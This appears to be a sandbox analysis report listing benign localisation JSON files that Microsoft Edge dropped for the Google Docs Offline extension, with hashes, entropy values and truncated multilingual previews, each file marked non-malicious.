                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1160
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
